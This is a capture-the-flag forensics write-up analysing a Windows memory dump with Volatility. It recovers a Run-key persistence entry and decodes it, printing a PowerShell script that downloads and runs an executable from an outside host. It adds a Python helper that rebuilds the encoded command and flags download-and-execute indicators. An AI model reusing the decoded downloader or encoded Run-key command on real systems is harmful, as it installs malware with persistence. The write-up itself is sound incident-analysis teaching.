Event: Cyber Santa is Coming to Town – 2021 HackTheBox
Category: Forensics
PTS: 300
Description:
Although Santa just updated his infra, problems still occur. He keeps complaining about slow boot time and a blue window popping up for a split second during startup. The IT elves support suggested that he should restart his computer. Ah, classic IT support!
Inside the zip file there's a .raw file, the same thing we saw previously in the honeypot challenge, so let's roll with the same modus operandi:
volatility -f ./persist.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/grizzly/codice/hacking/ctf/cyber_santa_is_coming_htb/forensics_persist/persist.raw)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82977c68L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82978d00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-11-30 22:05:35 UTC+0000
Image local date and time : 2021-11-30 14:05:35 -0800
We know we're dealing with an OS memory dump and we're looking for something that runs at boot, probably a PowerShell script (given the blue pop-up window), but there is no default module to help with that kind of search. Maybe the community has already faced this problem; let's check the internet.
http://tomchop.me/2014/09/18/volatility-autoruns/
They did. Using this simple plugin and following the instructions on the website, your command should be this, or at least similar:
volatility --plugins=volatility-autoruns/ --profile=Win7SP1x86_23418 -f ./persist.raw autoruns

As you can see, we have something launched by PowerShell from a Run key in ntuser.dat:
HIVE:
Hive: \??\C:\Users\Santa\ntuser.dat
Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-30 22:04:29 UTC+0000)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc <base64 blob omitted>
It's obviously a base64-encoded script. Decoding the base64 produces the following output (the dots are the null bytes of the UTF-16LE encoding that PowerShell uses for -EncodedCommand):
$.P.a.t.h. .=. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.\.w.i.n...e.x.e.'.;.i.f. .(.-.N.O.T.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.P.a.t.h. .-.P.a.t.h.T.y.p.e. .L.e.a.f.).).{.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.e.l.s.e.{.m.k.d.i.r. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.'.;.$.f.l.a.g. .=. .".H.T.B.{.T.h.3.s.3._.3.l.v.3.s._.4.r.3._.r.3.4.l.l.y._.m.4.l.1.c.1.0.u.s.}.".;.i.e.x. .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.".h.t.t.p.s.:././.w.i.n.d.o.w.s.l.i.v.e.u.p.d.a.t.e.r...c.o.m./.w.i.n...e.x.e.".,.$.P.a.t.h.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.%.
Which, cleaned up, looks like this:
$Path = 'C:\ProgramData\windows\win.exe';if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}else{mkdir 'C:\ProgramData\windows';$flag = "HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}";iex (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/win.exe",$Path);Start-Process $Path}%
With our flag in the clear.
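As an added example (not part of the writeup), here is a small Python triage helper that does the decoding step above programmatically: it pulls the -enc argument out of an autoruns Run-key value, decodes it as base64 over UTF-16LE (the encoding -EncodedCommand expects, and the reason a plain byte decode shows the dotted text), and flags the download-and-execute indicators an analyst would want to see. The sample Run-key value is constructed by re-encoding the script shown above; the regexes and function names are my own.

```python
import base64
import re
from typing import Optional

# Constructed sample: the decoded script from the writeup, re-encoded the way
# "powershell -enc" expects it (base64 over UTF-16LE). The real blob from the
# memory image is not reproduced here.
SAMPLE_SCRIPT = (
    "$Path = 'C:\\ProgramData\\windows\\win.exe';"
    "if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}"
    "else{mkdir 'C:\\ProgramData\\windows';"
    "$flag = \"HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}\";"
    "iex (New-Object System.Net.WebClient).DownloadFile("
    "\"https://windowsliveupdater.com/win.exe\",$Path);Start-Process $Path}"
)
SAMPLE_RUN_VALUE = (
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc, ...).
# The pattern deliberately does not match -ep / -ex (ExecutionPolicy).
ENC_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators on the command line itself and on the decoded script.
CMDLINE_INDICATORS = {
    "execution policy bypass": re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.I),
    "encoded command": ENC_FLAG,
}
SCRIPT_INDICATORS = {
    "download to disk": re.compile(r"DownloadFile\(", re.I),
    "invoke-expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "starts dropped binary": re.compile(r"Start-Process\s+\$\w+", re.I),
    "writes to ProgramData": re.compile(r"C:\\ProgramData\\", re.I),
}


def decode_encoded_command(run_value: str) -> Optional[str]:
    """Extract the -EncodedCommand argument and decode base64 -> UTF-16LE."""
    m = ENC_FLAG.search(run_value)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage_run_value(run_value: str) -> dict:
    """Decode an autoruns Run-key value and list indicators plus embedded URLs."""
    script = decode_encoded_command(run_value)
    hits = [n for n, rx in CMDLINE_INDICATORS.items() if rx.search(run_value)]
    urls = []
    if script is not None:
        hits += [n for n, rx in SCRIPT_INDICATORS.items() if rx.search(script)]
        urls = re.findall(r"https?://[^\s\"')]+", script)
    return {"script": script, "indicators": hits, "urls": urls}


def find_flags(text: str) -> list:
    """Pull HTB{...} flags out of decoded script text."""
    return re.findall(r"HTB\{[^}]*\}", text)
```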
This was pretty smooth thanks to the time spent on the honeypot challenge; we came in strong from that.